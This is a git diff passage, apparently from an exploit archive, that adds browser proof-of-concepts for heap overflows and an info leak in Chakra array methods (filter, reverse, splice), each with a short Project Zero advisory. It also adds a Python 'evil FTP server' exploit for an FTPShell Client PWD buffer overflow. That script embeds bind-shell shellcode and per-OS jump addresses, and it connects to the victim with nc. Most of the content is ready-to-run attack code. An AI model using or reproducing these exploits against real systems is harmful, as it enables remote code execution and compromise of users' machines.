b.length = 4;
a.shift.call(b);
print(a.shift.call(b[2]));
</script>
</body>
</html>

168
platforms/windows/dos/40785.html Executable file
View file

@ -0,0 +1,168 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=922
There is an info leak in Array.filter. In Chakra, the destination array that arrays are filtered into is initialized using ArraySpeciesCreate, which can create both native and variable arrays. However, the loop that calls the filter function assumes that the destination array is a variable array, and sets each value using DirectSetItemAt, which is unsafe, and can lead to a var pointer being written to an integer array. A PoC is as follows and attached:
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
constructor(){
return d;
}
}
class MyArray extends Array {
static get [Symbol.species]() {
return dummy;
}
}
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
function test(i){
return true;
}
a.__proto__ = MyArray.prototype;
var o = a.filter(test);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
<html><body><script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
class dummy{
constructor(){
alert("in constructor");
return d;
}
}
class MyArray extends Array {
// Overwrite species to the parent Array constructor
static get [Symbol.species]() {
alert("get");
b[0] = {};
return dummy; }
}
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
function test(i){
return true;
}
a.__proto__ = MyArray.prototype;
var o = a.filter(test);
alert(o);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
</script></body></html>
https://bugs.chromium.org/p/project-zero/issues/detail?id=922#c1
I looked a bit more into this issue, and I think it can actually be used to corrupt the heap too. The issue is that DirectSetItemAt is called on an int array when it thinks it's a Var array. But since elements of a Var array are twice as wide as elements of the int array, setting items at indexes larger than half the array length will write outside of the allocated array. I've attached a sample that crashes Edge and demonstrates the overflow.
-->
<html>
<body>
<script>
var b = new Array(1,2,3);
var d = new Array(1,2,3);
d.length = 0x200000;
d.fill(7);
class dummy{
constructor(){
alert("in constructor");
return d;
}
}
class MyArray extends Array {
// Overwrite species to the parent Array constructor
static get [Symbol.species]() {
alert("get");
b[0] = {};
return dummy; }
}
var a = new Array({}, [], "natalie", 7, 7, 7, 7, 7);
for(var i = 0; i < 0x200000; i++){
a[i] = i;
}
function test(i){
return true;
}
a.__proto__ = MyArray.prototype;
var o = a.filter(test);
alert(o);
var h = [];
for(item in o){
var n = new Number(o[item]);
if (n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
</script>
</body>
</html>

View file

@ -0,0 +1,82 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=925
There is an overflow when reversing arrays in Chakra.
On line 5112 of JavascriptArray::EntryReverse, the length of the array is fetched and stored. It is then passed as a parameter into JavascriptArray::ReverseHelper, which then calls FillFromPrototypes, which can change the size of the array. If the size of the array is set to be larger than it was when the length was fetched, the calculation of the array segment head left value on line 5219:
seg->left = ((uint32)length) - (seg->left + seg->length);
Can become a very large value (as length is larger than seg->length and seg->left is generally 0). This can cause the segment length to become larger than the segment size the next time SparseArraySegmentBase::EnsureSizeInBound is called, as the method contains the following code:
uint32 nextLeft = next ? next->left : JavascriptArray::MaxArrayLength;
Assert(nextLeft > left);
if(size != 0)
{
size = min(size, nextLeft - left);
}
nextLeft can be smaller than the segment length if next is null and left is very large, leading size to be set to a small value which is less than the segment length. Many other methods, including setting an element of an array assume that size is less than length, and often allocate size bytes then copy length bytes, leading to an overflow if length is actually more than size.
A minimal PoC is as follows:
var a = [1];
a.length = 1000;
var j = [];
var o = {};
Object.defineProperty(o, '1', {
get: function() {
a.length = 1002;
j.fill.call(a, 7.7);
return 2;
}
});
a.__proto__ = o;
var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;
A full PoC is attached. Note that this PoC sometimes needs to be refreshed a few times to cause a crash.
-->
<html>
<head><meta http-equiv="refresh" content="1">
</head>
<body>
<script>
var a = [1];
a.length = 1000;
var j = [];
var o = {};
Object.defineProperty(o, '1', {
get: function() {
//alert('get!');
a.length = 1002;
j.fill.call(a, 7.7);
return 2;
}
});
a.__proto__ = o;
var place = [];
for(var i = 0; i < 10; i++){
var r = j.reverse.call(a);
r.length = 0xfffffffe;
r[0xfffffffe - 1] = 10;
var q = [1,2,3,4,5,6,7,8,9,10];
place.push(q);
}
//alert(place.join());
</script>
</body>
</html>

View file

@ -0,0 +1,88 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=934
There is a heap overflow in Array.splice in Chakra.
When an array is spliced, and overflow check is performed, but ArraySpeciesCreate, which can execute code and alter the array is called after this. This can allow an Array with boundaries that cause integer overflows to be spliced, leading to heap overflows in several situations.
A minimal PoC is as follows and a full PoC is attached.
var a = [];
class dummy{}
a.length = 200000;
a.fill(7, 10000, 10200);
var o = {};
Object.defineProperty(o, 'constructor', {
get: function() {
a.length = 0xfffffffe;
var k = [];
k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
return dummy;
}
});
a.__proto__ = o;
var q = [];
q.length = 500;
q.fill(7.7);
var j = [];
a.length = 0xfffffffe - 500;
j.splice.call(a, 0, ...q);
a[0xfffff1ec - 1] = 10;
This PoC is a bit unreliable, it may need to be refreshed a few times to crash.
-->
<html>
<head>
<meta http-equiv="refresh" content="1">
</head>
<body>
<script>
var a = [];
class dummy{}
a.length = 200000;
a.fill(7, 10000, 10200);
var o = {};
Object.defineProperty(o, 'constructor', {
get: function() {
a.length = 0xfffffffe;
var k = [];
k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
return dummy;
}
});
a.__proto__ = o;
var q = [];
q.length = 500;
q.fill(7.7);
var j = [];
a.length = 0xfffffffe - 500;
j.splice.call(a, 0, ...q);
a[0xfffff1ec - 1] = 10;
</script>
</body>
</html>

113
platforms/windows/remote/40778.py Executable file
View file

@ -0,0 +1,113 @@
# -*- coding: utf-8 -*-
# Exploit Title: FTPShell Client v5.24 PWD Remote Buffer Overflow
# Date: 16/11/2016
# Author: Yunus YILDIRIM (Th3GundY)
# Team: CT-Zer0 (@CRYPTTECH) - http://www.ct-zer0.com
# Author Website: http://yildirimyunus.com
# Contact: yunusyildirim@protonmail.com
# Software Link: http://www.ftpshell.com/downloadclient.htm
# Tested on: Windows XP Professional SP 2
# Tested on: Windows 7 Ultimate 32bit, Home Premium 64bit
import socket
import sys
import os
import time
def banner():
banner = "\n\n"
banner += " ██████╗████████╗ ███████╗███████╗██████╗ ██████╗ \n"
banner += " ██╔════╝╚══██╔══╝ ╚══███╔╝██╔════╝██╔══██╗██╔═████╗ \n"
banner += " ██║ ██║█████╗ ███╔╝ █████╗ ██████╔╝██║██╔██║ \n"
banner += " ██║ ██║╚════╝███╔╝ ██╔══╝ ██╔══██╗████╔╝██║ \n"
banner += " ╚██████╗ ██║ ███████╗███████╗██║ ██║╚██████╔╝ \n"
banner += " ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═════╝ \n"
banner += " \n"
print banner
def usage():
banner()
print "[-] Missing arguments\n"
print "[*] Usage: python FTPShell-exploit.py target_os"
print "[*] Target types:\n\tWindows XP -> winxp\n\tWindows 7-32bit -> win7_32\n\tWindows 7-64bit -> win7_64\n"
sys.exit(0)
def exploit(target_eip):
s0ck3t = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s0ck3t.bind(("0.0.0.0", 21))
s0ck3t.listen(5)
print "[*] CT-Zer0 Evil FTP Server Listening port 21\n"
# \x00\x0a\x0d\x22\xff
# msfvenom -p windows/shell_bind_tcp LPORT=5656 -f c -b '\x00\x0a\x0d\x22\xff'
shellcode = ("\xbb\x61\xad\x84\xdf\xda\xcc\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x53\x31\x5a\x12\x83\xc2\x04\x03\x3b\xa3\x66\x2a\x47\x53\xe4"
"\xd5\xb7\xa4\x89\x5c\x52\x95\x89\x3b\x17\x86\x39\x4f\x75\x2b"
"\xb1\x1d\x6d\xb8\xb7\x89\x82\x09\x7d\xec\xad\x8a\x2e\xcc\xac"
"\x08\x2d\x01\x0e\x30\xfe\x54\x4f\x75\xe3\x95\x1d\x2e\x6f\x0b"
"\xb1\x5b\x25\x90\x3a\x17\xab\x90\xdf\xe0\xca\xb1\x4e\x7a\x95"
"\x11\x71\xaf\xad\x1b\x69\xac\x88\xd2\x02\x06\x66\xe5\xc2\x56"
"\x87\x4a\x2b\x57\x7a\x92\x6c\x50\x65\xe1\x84\xa2\x18\xf2\x53"
"\xd8\xc6\x77\x47\x7a\x8c\x20\xa3\x7a\x41\xb6\x20\x70\x2e\xbc"
"\x6e\x95\xb1\x11\x05\xa1\x3a\x94\xc9\x23\x78\xb3\xcd\x68\xda"
"\xda\x54\xd5\x8d\xe3\x86\xb6\x72\x46\xcd\x5b\x66\xfb\x8c\x33"
"\x4b\x36\x2e\xc4\xc3\x41\x5d\xf6\x4c\xfa\xc9\xba\x05\x24\x0e"
"\xbc\x3f\x90\x80\x43\xc0\xe1\x89\x87\x94\xb1\xa1\x2e\x95\x59"
"\x31\xce\x40\xf7\x39\x69\x3b\xea\xc4\xc9\xeb\xaa\x66\xa2\xe1"
"\x24\x59\xd2\x09\xef\xf2\x7b\xf4\x10\xea\x63\x71\xf6\x78\x84"
"\xd7\xa0\x14\x66\x0c\x79\x83\x99\x66\xd1\x23\xd1\x60\xe6\x4c"
"\xe2\xa6\x40\xda\x69\xa5\x54\xfb\x6d\xe0\xfc\x6c\xf9\x7e\x6d"
"\xdf\x9b\x7f\xa4\xb7\x38\xed\x23\x47\x36\x0e\xfc\x10\x1f\xe0"
"\xf5\xf4\x8d\x5b\xac\xea\x4f\x3d\x97\xae\x8b\xfe\x16\x2f\x59"
"\xba\x3c\x3f\xa7\x43\x79\x6b\x77\x12\xd7\xc5\x31\xcc\x99\xbf"
"\xeb\xa3\x73\x57\x6d\x88\x43\x21\x72\xc5\x35\xcd\xc3\xb0\x03"
"\xf2\xec\x54\x84\x8b\x10\xc5\x6b\x46\x91\xf5\x21\xca\xb0\x9d"
"\xef\x9f\x80\xc3\x0f\x4a\xc6\xfd\x93\x7e\xb7\xf9\x8c\x0b\xb2"
"\x46\x0b\xe0\xce\xd7\xfe\x06\x7c\xd7\x2a")
buffer = "A" * 400 + target_eip + "\x90" * 40 + shellcode
while True:
victim, addr = s0ck3t.accept()
victim.send("220 CT-Zer0 Evil FTP Service\r\n")
print "[*] Connection accepted from %s\n" % addr[0]
while True:
data = victim.recv(1024)
if "USER" in data:
victim.send("331 User name okay, need password\r\n\r\n")
print "\t[+] 331 USER = %s" % data.split(" ")[1],
elif "PASS" in data:
victim.send("230 Password accepted.\r\n230 User logged in.\r\n")
print "\t[+] 230 PASS = %s" % data.split(" ")[1],
elif "PWD" in data:
victim.send('257 "' + buffer + '" is current directory\r\n')
print "\t[+] 257 PWD"
print "\n[*] Exploit Sent Successfully\n"
time.sleep(2)
print '[+] You got bind shell on port 5656\n'
os.system('nc ' + str(addr[0]) + ' 5656')
if len(sys.argv) != 2:
usage()
else:
banner()
try:
if sys.argv[1] == "winxp":
# 7C80C75B JMP EBP kernel32.dll
target_eip = "\x5B\xC7\x80\x7C"
elif sys.argv[1] == "win7_32":
# 76ad0299 jmp ebp [kernel32.dll]
target_eip = "\x99\x02\xAD\x76"
elif sys.argv[1] == "win7_64":
# 7619dfce jmp ebp [kernel32.dll]
target_eip = "\xCE\xDF\x19\x76"
else:
usage()
exploit(target_eip)
except:
print "\n[O_o] KTHXBYE! [O_o]"